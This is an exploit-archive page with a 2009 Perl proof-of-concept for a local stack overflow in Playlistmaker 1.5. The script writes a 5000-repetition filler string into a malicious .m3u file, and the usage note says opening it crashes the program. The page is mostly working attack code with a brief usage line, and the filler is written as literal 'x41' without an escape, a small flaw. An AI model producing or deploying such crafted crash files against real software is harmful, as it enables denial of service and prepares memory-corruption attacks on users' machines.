[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Playlistmaker 1.5 (.M3U/M3L/TXT File) Local Stack Overflow PoC
# Published : 2009-07-11
# Author : ThE g0bL!N
# Previous Title : M3U/M3L to ASX/WPL 1.1 (ASX,M3U,M3L) Local BOF PoC
# Next Title : PatPlayer 3.9 (M3U File) Local Heap Overflow PoC
#!/usr/bin/perl
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
# # Playlistmaker v1.5 (.M3U/M3L/Txt File) Local Stack Overflow POC ##
# # Download: http://proletsoft.freeservers.com/mmb/playlistmaker.html ##
## Welcom Back Milw0rm ##
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
my $crash="x41" x 5000 ;
open(myfile,'>>PoC.m3u');# M3U/M3L/Txt
print myfile $crash;
##################################################################################
#By ThE g0bL!N
#Usgae:open existing Plylis => Poc.m3u => Click On file => Boom!!!
# Ismail Fiha seh :) Mada Bik Anta 1st Thotha :)
##################################################################################
# www.Syue.com [2009-07-11]